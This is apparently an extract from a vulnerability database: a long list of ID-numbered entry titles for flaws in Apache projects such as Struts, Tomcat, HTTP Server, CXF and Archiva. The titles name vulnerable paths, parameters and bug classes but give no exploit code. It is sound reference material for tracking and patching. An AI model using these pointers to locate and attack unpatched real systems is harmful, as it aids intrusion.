13206| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
13207| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
13208| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
13209| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
13210| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
13211| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
13212| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
13213| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
13214| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
13215| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
13216| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
13217| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
13218| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
13219| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
13220| [94279] Apache Qpid CA Certificate Validation Bypass
13221| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
13222| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
13223| [94042] Apache Axis JAX-WS Java Unspecified Exposure
13224| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
13225| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
13226| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
13227| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
13228| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
13229| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
13230| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
13231| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
13232| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
13233| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
13234| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
13235| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
13236| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
13237| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
13238| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
13239| [93541] Apache Solr json.wrf Callback XSS
13240| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
13241| [93521] Apache jUDDI Security API Token Session Persistence Weakness
13242| [93520] Apache CloudStack Default SSL Key Weakness
13243| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
13244| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
13245| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
13246| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
13247| [93515] Apache HBase table.jsp name Parameter XSS
13248| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
13249| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
13250| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
13251| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
13252| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
13253| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
13254| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
13255| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
13256| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
13257| [93252] Apache Tomcat FORM Authenticator Session Fixation
13258| [93172] Apache Camel camel/endpoints/ Endpoint XSS
13259| [93171] Apache Sling HtmlResponse Error Message XSS
13260| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
13261| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
13262| [93168] Apache Click ErrorReport.java id Parameter XSS
13263| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
13264| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
13265| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
13266| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
13267| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
13268| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
13269| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
13270| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
13271| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
13272| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
13273| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
13274| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
13275| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
13276| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
13277| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
13278| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
13279| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
13280| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
13281| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
13282| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
13283| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
13284| [93144] Apache Solr Admin Command Execution CSRF
13285| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
13286| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
13287| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
13288| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
13289| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
13290| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
13291| [92748] Apache CloudStack VM Console Access Restriction Bypass
13292| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
13293| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
13294| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
13295| [92706] Apache ActiveMQ Debug Log Rendering XSS
13296| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
13297| [92270] Apache Tomcat Unspecified CSRF
13298| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
13299| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
13300| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
13301| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
13302| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
13303| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
13304| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
13305| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
13306| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
13307| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
13308| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
13309| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
13310| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
13311| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
13312| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
13313| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
13314| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
13315| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
13316| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
13317| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
13318| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
13319| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
13320| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
13321| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
13322| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
13323| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
13324| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
13325| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
13326| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
13327| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
13328| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
13329| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
13330| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
13331| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
13332| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
13333| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
13334| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
13335| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
13336| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
13337| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
13338| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
13339| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
13340| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
13341| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
13342| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
13343| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
13344| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
13345| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
13346| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
13347| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
13348| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
13349| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
13350| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
13351| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
13352| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
13353| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
13354| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
13355| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
13356| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
13357| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
13358| [86901] Apache Tomcat Error Message Path Disclosure
13359| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
13360| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
13361| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
13362| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
13363| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
13364| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
13365| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
13366| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
13367| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
13368| [85430] Apache mod_pagespeed Module Unspecified XSS
13369| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
13370| [85249] Apache Wicket Unspecified XSS
13371| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
13372| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
13373| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
13374| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
13375| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
13376| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
13377| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
13378| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
13379| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
13380| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
13381| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
13382| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
13383| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
13384| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
13385| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
13386| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
13387| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
13388| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
13389| [83339] Apache Roller Blogger Roll Unspecified XSS
13390| [83270] Apache Roller Unspecified Admin Action CSRF
13391| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
13392| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
13393| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
13394| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
13395| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
13396| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
13397| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
13398| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
13399| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
13400| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
13401| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
13402| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
13403| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
13404| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
13405| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
| [80300] Apache Wicket wicket:pageMapName Parameter XSS
| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
| [78331] Apache Tomcat Request Object Recycling Information Disclosure
| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
| [77593] Apache Struts Conversion Error OGNL Expression Injection
| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
| [74725] Apache Wicket Multi Window Support Unspecified XSS
| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
| [73644] Apache XML Security Signature Key Parsing Overflow DoS
| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
| [73154] Apache Archiva Multiple Unspecified CSRF
| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
| [72238] Apache Struts Action / Method Names <
| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
| [71557] Apache Tomcat HTML Manager Multiple XSS
| [71075] Apache Archiva User Management Page XSS
| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
| [70924] Apache Continuum Multiple Admin Function CSRF
| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
| [69520] Apache Archiva Administrator Credential Manipulation CSRF
| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
| [65054] Apache ActiveMQ Jetty Error Handler XSS
| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
| [63895] Apache HTTP Server mod_headers Unspecified Issue
| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
| [63140] Apache Thrift Service Malformed Data Remote DoS
| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
| [60678] Apache Roller Comment Email Notification Manipulation DoS
| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
| [60232] PHP on Apache php.exe Direct Request Remote DoS
| [60176] Apache Tomcat Windows Installer Admin Default Password
| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
| [59944] Apache Hadoop jobhistory.jsp XSS
| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
